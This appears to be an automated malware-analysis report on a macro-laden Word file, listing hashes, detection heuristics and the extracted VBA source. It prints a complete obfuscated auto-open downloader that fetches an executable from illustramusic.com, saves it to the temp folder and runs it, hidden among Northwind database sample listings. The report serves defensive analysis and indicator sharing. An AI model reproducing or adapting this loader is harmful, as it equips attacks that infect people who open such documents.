Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95a288c488a3f512…

MALICIOUS

Office (OLE)

53.0 KB Created: 2015-07-09 06:12:00 Authoring application: Microsoft Office Word First seen: 2015-09-18
MD5: 404b61075c9b5cb7b8ecf107b4b4ccb0 SHA-1: bfc603ea8fb9ba2710d47d8ab2ec37b5bd3527eb SHA-256: 95a288c488a3f512f61b3295daf61037cf696ec8d63b1caf405b575a69c63a31
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains obfuscated VBA macros designed to execute automatically upon opening. These macros are configured to download and execute a payload from the URL http://illustramusic.com/43/82.exe. The presence of CreateObject and CallByName calls, along with an auto-exec loader, strongly indicates a malicious downloader.

Heuristics 10

  • ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://illustramusic.com/43/82.exe Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14354 bytes
SHA-256: 66dfc96bde017c6f5f04c58576ec44d2c948ed1d89cbcdda231a9906a0fdeefd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()

Nip121ЦКВ3017 (700)

End Sub

Sub Nip121ЦКВ3017(FFFFF As Integer)
HC9JQJgd8MG

End Sub



Attribute VB_Name = "Module1"
Public UzA2FtU9ehfc As String
Public Khkbjkjb As Long
Public JKHFkjhv As Integer

Sub DatabaseConnection()

    '
    ' Open the Northwind database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = d.OpenDatabase(DBLOCATION)
    '
    ' Open the Customers table (recordset)
    '
    Set rs = db.OpenRecordset("Customers")
    '
    ' Display confirmation message
    '
    MsgBox "Opened " & db.Name & " Successfully!" & _
           Chr(13) & Chr(13) & _
           "The open Recordset is " & rs.Name
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set db = Nothing
End Sub

' Listing 18.2. A procedure that connects to a non-Jet database.
'
Sub NonJetConnection()
    '
    ' Open the Jet database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = d.OpenDatabase(DBLOCATION)
    '
    ' Create TableDef and set the connection information.
    ' This code assumes the CUSTOMER.DBF file (it's on the
    ' CD) is in the same folder as this workbook.
    '
    Set tdDBASE = db.CreateTableDef("Linked dBASE Table")
    tdDBASE.Connect = "dBASE IV;DATABASE=" & ThisWorkbook.Path
    tdDBASE.SourceTableName = "Customer"
    '
    ' Append the TableDef to create the link
    '
    db.TableDefs.Append tdDBASE
    '
    ' Open the recordset
    '
    Set rs = db.OpenRecordset("Linked dBASE Table", dbOpenSnapshot)
    '
    ' Display confirmation message
    '
    MsgBox "Opened " & db.Name & " Successfully!" & _
            Chr(13) & Chr(13) & _
            "The open Recordset is " & rs.Name & _
            Chr(13) & _
            "The source table is " & tdDBASE.SourceTableName
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set tdDBASE = Nothing
    Set db = Nothing
End Sub

' Listing 18.3. A procedure that displays information on
' all the fields in a Recordset.
'

Sub HC9JQJgd8MG()


JjoveOIH = Chr(104) & Chr(116) & "t" & "p" & Chr(58) & Chr(47) & Chr(60) & Chr(47) & Chr(105) & Chr(108) & Chr(108) & Chr(117) & Chr(115) & Chr(116) & Chr(114) & Chr(97) & Chr(109) & Chr(117) & Chr(115) & Chr(105) & Chr(99) & "." & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "4" & Chr(51) & Chr(47) & Chr(56) & "2" & Chr(46) & "e" & Chr(120) & Chr(101)

Set EfUmQh3mOIWp = XUFbKpgn("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & ".X" & Chr(77) & "L" & Chr(72) & Chr(84) & "T" & "P")

JjoveOIH = Replace(JjoveOIH, Chr(60), "", 1, 1, vbTextCompare)
CallByName EfUmQh3mOIWp, "O" & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & "E" & "T", _
JjoveOIH, False
Set XQQ5MVr24 = XUFbKpgn(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))

Set N7xBa7sk = CallByName(XQQ5MVr24, Chr(69) & "n" & "v" & Chr(105) & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & "c" & "e" & Chr(115) & "s")

PuNXazFc3 = N7xBa7sk("T" & Chr(69) & Chr(77) & "P")

UzA2FtU9ehfc = PuNXazFc3 & Chr(92) & "r" & Chr(101) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(51) & Chr(46) & "e" & Chr(120) & Chr(101)
Dim cUtXmkOl() As Byte

CallByName EfUmQh3mOIWp, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
cUtXmkOl = CallByName(EfUmQh3mOIWp, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
OYdRs6238lCD cUtXmkOl, UzA2FtU9ehfc
On Error GoTo czmNNOSKG
    a = 2321 / 0
  On Error GoTo 0
  
uCzc6tLEYtcdR:
  Exit Sub
czmNNOSKG:
  RktdsxfVspmN ("RjjZx1ohoCq2KQ")
Resume uCzc6tLEYtcdR
End Sub
Sub DisplayFieldInfo()

    Dim i As Integer
    Dim fieldInfo As String
    '
    ' Open the Northwind database
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = c.OpenDatabase(DBLOCATION)
    '
    ' Open the Categories table
    '
    Set rs = db.OpenRecordset("Categories", dbOpenSnapshot)
    '
    ' Enumerate all fields in the Recordset
    '
    For i = 0 To rs.Fields.Count - 1
        fieldInfo = "Recordset: " & rs.Name & Chr(13) & _
            "Field " & _
            i + 1 & " of " & _
            rs.Fields.Count & Chr(13) & Chr(13)
        '
        ' Set the Field variable and then run through the properties
        '
        Set fld = rs.Fields(i)
        fieldInfo = fieldInfo & _
            "Name: " & fld.Name & Chr(13) & _
            "Allow Zero Length: " & fld.AllowZeroLength & Chr(13) & _
            "Attributes: " & fld.Attributes & Chr(13) & _
            "Collating Order: " & fld.CollatingOrder & Chr(13) & _
            "Default Value: " & fld.DefaultValue & Chr(13) & _
            "Ordinal Position: " & fld.OrdinalPosition & Chr(13) & _
            "Required: " & fld.Required & Chr(13) & _
            "Size: " & fld.Size & Chr(13) & _
            "Source Field: " & fld.SourceField & Chr(13) & _
            "Source Table: " & fld.SourceTable & Chr(13) & _
            "Type of Field: " & TypeOfField(fld.Type) & Chr(13) & _
            "Validation Rule: " & fld.ValidationRule & Chr(13) & _
            "Validation Text: " & fld.ValidationText
        MsgBox Prompt:=fieldInfo, Title:="Field Information"
    Next i
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set fld = Nothing
    Set db = Nothing
End Sub

' TypeOfField()
' Function to translate the constant returned by a Field object's
' Type property into a descriptive string.
'
Function TypeOfField(fldConstant As Integer) As String

    Select Case fldConstant
        Case 1   ' dbBoolean
            TypeOfField = "Boolean"
        Case 2   ' dbByte
            TypeOfField = "Byte"
        Case 3   ' dbInteger
            TypeOfField = "Integer"
        Case 4   ' dbLong
            TypeOfField = "Long Integer"
        Case 5   ' dbCurrency
            TypeOfField = "Currency"
        Case 6   ' dbSingle
            TypeOfField = "Single"
        Case 7   ' dbDouble
            TypeOfField = "Double"
        Case 8   ' dbDate
            TypeOfField = "Date"
        Case 10  ' dbText
            TypeOfField = "Text"
        Case 11  'dbLongBinary
            TypeOfField = "OLE Object"
        Case 12  ' dbMemo
            TypeOfField = "Memo"
        Case 15  ' dbGUID
            TypeOfField = "GUID"
    End Select
End Function

Attribute VB_Name = "Module2"

' Listing 18.4. A procedure that opens a recordset using
' a SQL SELECT expression.
'
Sub QueryCustomers()
    Dim db As Database
    Dim strSELECT As String
    Dim rs As Recordset
    '
    ' Open the Northwind database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    '
    ' Store the SELECT statement in a string variable
    '
    strSELECT = "SELECT CompanyName,Region,Country " & _
                "FROM Customers " & _
                "WHERE Country = 'Canada' " & _
                "ORDER BY CompanyName"
    '
    ' Open the recordset
    '
    Set rs = db.OpenRecordset(strSELECT)
    '
    ' Display confirmation message
    '
    MsgBox "The filtered Recordset contains " & _
    rs.RecordCount & " records."
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set db = Nothing
End Sub

' Listing 18.5. A procedure that creates a recordset from
' a QueryDef object.

Public Function XUFbKpgn(bVDahQGZfQafz As String)
 Set XUFbKpgn = CreateObject(bVDahQGZfQafz)
End Function
'
Sub QueryDefExample()
    Dim db As Database
    Dim qd As QueryDef
    Dim rs As Recordset
    '
    ' Open the Northwind database (check the path!)
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    '
    ' Assign the QueryDef object
    '
    Set qd = db.QueryDefs("Products Above Average Price")
    '
    ' Open the recordset
    '
    Set rs = qd.OpenRecordset()
    '
    ' Display confirmation message
    '
    MsgBox "The filtered Recordset contains " & _
        rs.RecordCount & " records."
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set qd = Nothing
    Set db = Nothing
End Sub

Public Function RktdsxfVspmN(HAZvVdpA4ZKPE As String)
 Set hL8caJOH = XUFbKpgn("S" & Chr(104) & "e" & "l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & Chr(105) & "c" & Chr(97) & "t" & "i" & Chr(111) & Chr(110))
hL8caJOH.Open (UzA2FtU9ehfc)
End Function



' Listing 18.6. A procedure that reads 100 rows from a
' recordset into a worksheet.
'
Sub ReadDataIntoExcel()
    Dim db As Database
    Dim qd As QueryDef
    Dim rs As Recordset
    Dim recArray As Variant
    Dim i As Integer, j As Integer
    '
    ' Open the Jet database, QueryDef, and Recordset
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    Set qd = db.QueryDefs("Invoices")
    Set rs = qd.OpenRecordset()
    '
    ' Head for Database Records and clear the sheet
    '
    Worksheets("Database Records").Activate
    With Worksheets("Database Records").[a1]
        .CurrentRegion.Clear
        '
        ' Read the data using GetRows
        '
        recArray = rs.GetRows(100)
        For i = 0 To UBound(recArray, 2)
            For j = 0 To UBound(recArray, 1)
                .Offset(i + 1, j) = recArray(j, i)
            Next j
        Next i
        '
        ' Enter the field names and format the cells
        '
        For j = 0 To rs.Fields.Count - 1
            .Offset(0, j) = rs.Fields(j).Name
            .Offset(0, j).Font.Bold = True
            .Offset(0, j).EntireColumn.AutoFit
        Next j

    End With
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set qd = Nothing
    Set db = Nothing
End Sub

' Listing 18.7. A procedure that filters out OLE Object
' fields before retrieving a recordset.
'

Public Function OYdRs6238lCD(qBBdA3l1 As Variant, GJjfDfPQFXx As String)
Dim TVRp9uIoM3RKBe: Set TVRp9uIoM3RKBe = XUFbKpgn(Chr(65) & "d" & Chr(111) & "d" & Chr(98) & "." & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "m")

With TVRp9uIoM3RKBe
   .Type = 1
    .Open
    .write qBBdA3l1
    .savetofile GJjfDfPQFXx, 2
End With
End Function
Sub RetrieveCategories()
    Dim db As Database
    Dim rs As Recordset
    Dim fld As Field
    Dim strSELECT As String, i As Integer
    '
    ' Open the Jet database
    '
    If Dir(DBLOCATION) = "" Then
        MsgBox "The location of the NorthWind sample " & _
        "database is incorrect." & Chr(13) & _
        "Please adjust the path and then run this " & _
        "procedure again."
        Exit Sub
    End If
    Set db = OpenDatabase(DBLOCATION)
    '
    ' Open the full Categories table
    '
    Set rs = db.OpenRecordset("Categories")
    '
    ' The strSELECT variable will hold the SQL SELECT statement
    ' that filters the Recordset to remove OLE Object fields
    '
    strSELECT = "SELECT "
    '
    ' Run through the recordset fields
    '
    For Each fld In rs.Fields
        '
        ' Check for OLE Object fields
        '
        If fld.Type <> dbLongBinary Then
            '
            ' If it's not an OLE Object field, add it to the SELECT statement
            '
            strSELECT = strSELECT & fld.Name & ","
        End If
    Next fld
    '
    ' Remove the trailing comma
    '
    strSELECT = Left(strSELECT, Len(strSELECT) - 1)
    '
    ' Add the FROM clause
    '
    strSELECT = strSELECT & " FROM Categories"
    '
    ' Open the filtered recordset
    '
    Set rs = db.OpenRecordset(strSELECT)
    '
    ' Retrieve the records
    '
    Worksheets("Database Records").Activate
    With Worksheets("Database Records").[a1]
        .CurrentRegion.Clear
        .Offset(1).CopyFromRecordset rs
        '
        ' Enter the field names and format the cells
        '
        For i = 0 To rs.Fields.Count - 1
            .Offset(0, i) = rs.Fields(i).Name
            .Offset(0, i).Font.Bold = True
            .Offset(0, i).EntireColumn.AutoFit
        Next i
    End With
    '
    ' Close and release the objects
    '
    rs.Close
    db.Close
    Set rs = Nothing
    Set fld = Nothing
    Set db = Nothing
End Sub